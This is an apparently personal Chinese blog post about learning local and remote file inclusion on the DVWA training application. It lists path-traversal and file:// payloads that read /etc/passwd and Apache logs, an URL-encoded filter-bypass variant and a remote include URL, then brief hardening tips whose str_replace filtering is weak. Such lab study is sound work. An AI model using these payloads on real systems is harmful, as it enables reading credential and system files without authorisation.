美文网首页
DVWA文件包含漏洞学习

DVWA文件包含漏洞学习

作者: get0shell | 来源:发表于2018-09-11 10:07 被阅读0次

文件包含分为LFI本地文件包含和RFI远程文件包含,本次主要以本地文件包含为主进行测试。

进行到DVWA下的File Inclusion(文件包含)菜单下,进入到file1.php页面,获取页面格式为page=file1.php。

文件包含漏洞就是通过include函数将web根目录以外的目录的文件被包含进来,首先测试是否将passwd文件包含,利用page=../../../../../../../etc/passwd,进行提交;

passwd文件在页面显示出,同时,还可以利用page=file:///etc/passwd,如果存在相关安全设备对etc/passwd等字符进行了过滤,可以利用编码后提交尝试绕过,page=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64

常见包含漏洞测试方法:

?file=../../../../../var/log/apache2/access.log

?page=file:///var/log/apache2/access.log

?home=main.cgi

?page=http://www.a.com/index.php

http://1.1.1.1/../../../../dir/file.txt

加固方法:

过滤或禁止敏感参数,其中以“../../”等目录跳转符号为主

尽量防止或不用动态文件包含

调用str_replace()函数实现相关敏感字符的过滤,可以防御了远程文件包含

相关文章

  • DVWA文件包含漏洞学习

    文件包含分为LFI本地文件包含和RFI远程文件包含,本次主要以本地文件包含为主进行测试。 进行到DVWA下的Fil...

  • DVWA之文件包含漏洞

    文档:http://www.freebuf.com/articles/web/119150.html File I...

  • DVWA-File Inclusion(文件包含)

    本系列文集:DVWA学习笔记 文件包含漏洞,是指当服务器开启allow_url_include选项时,就可以通过p...

  • DVWA文件包含

    遇到此问题 The PHP function allow_url_include is not enabled. ...

  • php安全

    文件包含漏洞** 本地文件包含**能打开并包含本地文件的漏洞,被称为本地文件包含漏洞(LFI)%00截断,php内...

  • Dvwa的安装,小网站的漏洞资源库

    Dvwa的安装,小网站的漏洞资源库,这里先做Dvwa的安装,接下来会有Dvwa的漏洞查询方式说明。 DVWA(de...

  • DVWA搭建教程详解

    DVWA(Damn Vulnerable Web Application)是一个包含一些基本WEB漏洞的web应用...

  • DVWA-File Upload(文件上传)

    本系列文集:DVWA学习笔记 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以...

  • 文件包含漏洞学习总结

    什么是文件包含 简单一句话,为了更好地使用代码的重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来,直...

  • 搭建DVWA漏洞环境

    搭建DVWA漏洞环境 在kali上安装docker docker运行dvwa 初始化dvwa 登录

网友评论

      本文标题:DVWA文件包含漏洞学习

      本文链接:https://www.haomeiwen.com/subject/sueygftx.html